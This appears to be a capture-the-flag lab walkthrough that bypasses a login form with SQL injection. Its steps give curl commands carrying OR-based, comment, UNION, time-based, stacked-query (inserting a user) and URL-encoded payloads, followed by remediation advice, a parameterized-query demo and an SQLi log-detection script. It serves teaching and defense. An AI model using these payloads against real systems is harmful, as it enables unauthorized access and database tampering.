Auth Bypass

Challenge 07 Dec 2025 Free Access Solution Available

1 Flag | 5 Points | 49% Success Rate
This solution is for Flags Mode

This walkthrough explains how to hack the lab and capture the flags. For help with Learning Mode questions, use the Request Hint button next to each question.

Auth Bypass - Complete Solution Walkthrough

Step 1: Initial Discovery and Assessment

  1. Challenge Presentation: Access the challenge at <target-ip>:80 to understand the objectives and scenario.
  2. Service Discovery: Scan for open ports and services:
nmap -p 1-10000 <target-ip>
  3. Expected Findings: You should discover:
    • Port 80: Challenge presentation page
    • Port 8080: The target authentication system
  4. Initial Reconnaissance: Access the authentication system:
curl http://<target-ip>:8080/

Step 2: Authentication System Analysis

  1. Web Interface Analysis: The system presents a login form with username and password fields.
  2. Authentication Mechanism: The application uses a standard username/password authentication system.
  3. Backend Analysis: Based on the behavior, the system appears to use SQL database queries for user authentication.
  4. Normal Authentication Test: Try legitimate login attempts to understand the system behavior:
# Test with valid format but wrong credentials
curl -X POST http://<target-ip>:8080/login \
  -H "Content-Type: application/x-www-form-urlencoded" \
  -d "username=admin&password=password"

Step 3: SQL Injection Testing

  1. Hypothesis: If the application constructs SQL queries using user input without proper sanitization, it may be vulnerable to SQL injection.
  2. Basic SQL Injection Test: Test for SQL injection by using single quotes to break the SQL syntax:
# Test for SQL injection vulnerability
curl -X POST http://<target-ip>:8080/login \
  -H "Content-Type: application/x-www-form-urlencoded" \
  -d "username=admin'&password=test"
  3. SQL Error Analysis: Look for SQL error messages in the response; a syntax error triggered by the single quote indicates that the input reached the query unescaped.
  4. Comment-Based Injection Strategy: The SQL comment sequence -- makes the database ignore the rest of the query, which removes the password check entirely.
  5. Authentication Bypass Payloads: Test classic SQL injection authentication bypass payloads:
# Classic OR-based authentication bypass
curl -X POST http://<target-ip>:8080/login \
  -H "Content-Type: application/x-www-form-urlencoded" \
  -d "username=admin' OR '1'='1&password=anything"

# Alternative payload
curl -X POST http://<target-ip>:8080/login \
  -H "Content-Type: application/x-www-form-urlencoded" \
  -d "username=admin' OR 1=1--&password=test"

# Comment-based bypass
curl -X POST http://<target-ip>:8080/login \
  -H "Content-Type: application/x-www-form-urlencoded" \
  -d "username=admin'--&password=anything"

Step 4: Successful Authentication Bypass

  1. Working Payload: The following payload should successfully bypass authentication:
curl -X POST http://<target-ip>:8080/login \
  -H "Content-Type: application/x-www-form-urlencoded" \
  -d "username=admin' OR '1'='1&password=test"
  2. Expected Response: Upon successful bypass, the application should return a success message containing the flag.
  3. Alternative Successful Payloads: Other payloads that should work:
# Using UNION injection approach
curl -X POST http://<target-ip>:8080/login \
  -H "Content-Type: application/x-www-form-urlencoded" \
  -d "username=' UNION SELECT 1--&password=test"

# Comment out password check
curl -X POST http://<target-ip>:8080/login \
  -H "Content-Type: application/x-www-form-urlencoded" \
  -d "username=admin'/*&password=*/OR/**/1=1--"

Step 5: Flag Extraction

  1. Flag Discovery: Upon successful authentication bypass, the application displays the flag in the response.
  2. Flag Verification: The flag will be displayed in UUID format when the SQL injection is successful.
  3. Web Browser Method: You can also perform the attack using a web browser by manually entering the SQL injection payload in the username field.

Step 6: Understanding the Vulnerability

  1. Root Cause Analysis: The vulnerability exists because the application constructs SQL queries by directly concatenating user input without proper parameterization or sanitization.
  2. Vulnerable Code Pattern: The problematic SQL query likely looks like:
# Vulnerable SQL construction
query = f"SELECT * FROM users WHERE username='{username}' AND password='{password}'"
  3. Attack Mechanism: By injecting SQL syntax into the username field, attackers can modify the query logic to always return true, bypassing authentication.
  4. Modified Query Example: When the payload admin' OR '1'='1 is used, the application executes:
# Resulting malicious query
SELECT * FROM users WHERE username='admin' OR '1'='1' AND password='test'
Because AND binds more tightly than OR, the database evaluates this as username='admin' OR ('1'='1' AND password='test'), so the admin row is returned whatever password was supplied.
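To make Step 6 concrete, the following added example (not code from the lab or its authors) runs the walkthrough's vulnerable string-concatenation pattern and its parameterized counterpart side by side against a constructed in-memory SQLite table, so the effect of each payload from Steps 3 and 4 can be observed locally. The table contents, the password s3cret and the function names are assumptions made for this demonstration.

```python
import sqlite3


def make_db():
    """Constructed in-memory users table for the demo (not the lab's database)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 's3cret')")  # assumed row
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """The walkthrough's vulnerable pattern: input concatenated into the SQL text."""
    query = f"SELECT * FROM users WHERE username='{username}' AND password='{password}'"
    return conn.execute(query).fetchone() is not None


def login_parameterized(conn, username, password):
    """Remediated version: values are bound by the driver, never parsed as SQL."""
    query = "SELECT * FROM users WHERE username = ? AND password = ?"
    return conn.execute(query, (username, password)).fetchone() is not None


def raises_sql_error(login, conn, username, password):
    """True if the login function fails with a database error for this input.
    For the vulnerable version a lone quote breaks the SQL syntax, which is the
    error signal Step 3 looks for; the parameterized version never errors."""
    try:
        login(conn, username, password)
        return False
    except sqlite3.Error:
        return True


if __name__ == "__main__":
    conn = make_db()
    bypass = "admin' OR '1'='1"
    print("vulnerable, bypass payload:    ", login_vulnerable(conn, bypass, "test"))
    print("vulnerable, comment payload:   ", login_vulnerable(conn, "admin'--", "x"))
    print("vulnerable, lone quote errors: ", raises_sql_error(login_vulnerable, conn, "admin'", "test"))
    print("parameterized, bypass payload: ", login_parameterized(conn, bypass, "test"))
    print("parameterized, real password:  ", login_parameterized(conn, "admin", "s3cret"))
```

The vulnerable function accepts the bypass and comment payloads and throws a syntax error on the lone quote, while the parameterized function treats every one of those strings as a literal username that matches no row and never errors; the difference is entirely in how the input reaches the database, not in any filtering of the input itself.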

Step 7: Advanced SQL Injection Techniques

  1. Time-Based Blind SQL Injection: If the application doesn't show direct output, you can use time delays:
# Time-based payload
curl -X POST http://<target-ip>:8080/login \
  -H "Content-Type: application/x-www-form-urlencoded" \
  -d "username=admin'; WAITFOR DELAY '0:0:5'--&password=test"
Note that WAITFOR DELAY is Microsoft SQL Server syntax; other database engines reject it with a syntax error rather than pausing.
  2. Boolean-Based Blind SQL Injection: Test logical conditions:
# Boolean-based payload
curl -X POST http://<target-ip>:8080/login \
  -H "Content-Type: application/x-www-form-urlencoded" \
  -d "username=admin' AND (SELECT COUNT(*) FROM users)>0--&password=test"
  3. Database Enumeration: Extract database information:
# Extract database version
curl -X POST http://<target-ip>:8080/login \
  -H "Content-Type: application/x-www-form-urlencoded" \
  -d "username=' UNION SELECT @@version--&password=test"

Step 8: Alternative Attack Vectors

  1. Password Field Injection: Test SQL injection in the password field:
# Password field SQL injection
curl -X POST http://<target-ip>:8080/login \
  -H "Content-Type: application/x-www-form-urlencoded" \
  -d "username=admin&password=' OR '1'='1"
  2. Stacked Queries: If the database supports multiple statements:
# Stacked query injection
curl -X POST http://<target-ip>:8080/login \
  -H "Content-Type: application/x-www-form-urlencoded" \
  -d "username=admin'; INSERT INTO users VALUES('hacker','pass')--&password=test"
  3. URL Encoding: If special characters are filtered, use URL encoding:
# URL encoded payload
curl -X POST http://<target-ip>:8080/login \
  -H "Content-Type: application/x-www-form-urlencoded" \
  -d "username=admin%27%20OR%20%271%27%3D%271&password=test"

Security Implications and Remediation

  1. Vulnerability Classification: This is a critical SQL injection vulnerability (CWE-89) that allows authentication bypass and potentially data exfiltration.
  2. Impact Assessment: Successful exploitation allows:
    • Complete authentication bypass
    • Unauthorized access to protected resources
    • Potential data extraction from the database
    • Possible privilege escalation
  3. Proper Remediation:
    • Use parameterized queries/prepared statements
    • Implement input validation and sanitization
    • Apply principle of least privilege for database access
    • Use stored procedures with proper parameter handling
    • Implement Web Application Firewalls (WAF)
    • Regular security code reviews and testing
  4. Secure Implementation Example:
# Secure parameterized query (Python example)
import sqlite3
from contextlib import closing

def authenticate_user(username, password):
    # closing() releases the connection even if the query raises
    with closing(sqlite3.connect('database.db')) as conn:
        cursor = conn.cursor()

        # Parameterized query: the driver binds the values separately from the
        # SQL text, so quotes or comment sequences in the input cannot change
        # the structure of the query
        query = "SELECT * FROM users WHERE username = ? AND password = ?"
        cursor.execute(query, (username, password))

        result = cursor.fetchone()

    # A production system should store and compare password hashes rather
    # than plaintext passwords; parameterization alone does not address that
    return result is not None
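From the defender's side, the payloads shown in Steps 3, 4, 7 and 8 leave recognisable traces in a login log. The following added example (not part of the walkthrough or the lab) URL-decodes the form body of each request, as the application itself would, and applies a few structural signature rules over constructed sample lines; the log format, the client addresses and the rule names are assumptions made for this demonstration.

```python
import re
from urllib.parse import parse_qs

# Constructed sample login log (not the lab's logs): "<client> <method> <path> <form body>"
SAMPLE_LOG = [
    "203.0.113.5 POST /login username=admin&password=password",
    "203.0.113.5 POST /login username=admin%27&password=test",
    "203.0.113.5 POST /login username=admin%27+OR+%271%27%3D%271&password=anything",
    "198.51.100.7 POST /login username=alice&password=Summer2025%21",
    "203.0.113.5 POST /login username=%27+UNION+SELECT+1--&password=test",
    "203.0.113.5 POST /login username=admin%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27--&password=test",
    "203.0.113.5 POST /login username=admin&password=%27+OR+%271%27%3D%271",
]

# Rules applied to every decoded form value. They key on SQL structure (a quote
# followed by a boolean operator, comment sequences, UNION, stacked statements,
# tautologies) rather than on a lone quote, so a password like O'Brien1! is not flagged.
RULES = [
    ("quote_then_boolean", re.compile(r"'\s*(or|and)\b", re.I)),
    ("sql_comment", re.compile(r"--|/\*")),
    ("union_select", re.compile(r"\bunion\b.*\bselect\b", re.I | re.S)),
    ("stacked_statement", re.compile(r";\s*(waitfor|insert|update|delete|drop|select)\b", re.I)),
    ("tautology", re.compile(r"(\w+)'?\s*=\s*'?\1\b")),
]
# A quote in the username field is suspicious on its own (Step 3's probe), since
# usernames, unlike passwords, are not expected to contain one.
USERNAME_QUOTE = ("quote_in_username", re.compile(r"'"))


def scan_line(line):
    """Return (client, field, rule) findings for one log line, after URL-decoding."""
    client, _method, _path, body = line.split(" ", 3)
    # parse_qs decodes %27, %3D and '+', so the encoded payloads of Step 8 are inspected decoded
    fields = parse_qs(body, keep_blank_values=True)
    findings = []
    for field, values in fields.items():
        for value in values:
            for name, rx in RULES:
                if rx.search(value):
                    findings.append((client, field, name))
            if field == "username" and USERNAME_QUOTE[1].search(value):
                findings.append((client, field, USERNAME_QUOTE[0]))
    return findings


def scan_log(lines):
    return [finding for line in lines for finding in scan_line(line)]


def summarize(findings):
    """Map each client to the set of rules it triggered; several distinct rules
    from one client is the pattern of a manual probe such as Steps 3 and 7."""
    by_client = {}
    for client, _field, rule in findings:
        by_client.setdefault(client, set()).add(rule)
    return by_client


if __name__ == "__main__":
    for client, rules in summarize(scan_log(SAMPLE_LOG)).items():
        print(f"{client}: {len(rules)} rule(s) -> {sorted(rules)}")
```

Decoding before matching matters: the percent-encoded payload from Step 8 is identical to the plain one once parse_qs has processed it, so a rule set that only inspected the raw body would miss it. The per-client summary is the more useful signal for triage, since a single quote in a username can be a typo, whereas one client triggering comment, UNION and stacked-statement rules in quick succession is a probe.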

Tools and Techniques Summary

  • Manual Testing: curl, web browser, manual payload crafting
  • Automated Tools: sqlmap, Burp Suite, OWASP ZAP
  • Payload Types: OR-based, UNION-based, comment injection, time-based blind
  • Detection Methods: Error-based, boolean-based, time-based responses
  • Database Enumeration: Version detection, table discovery, data extraction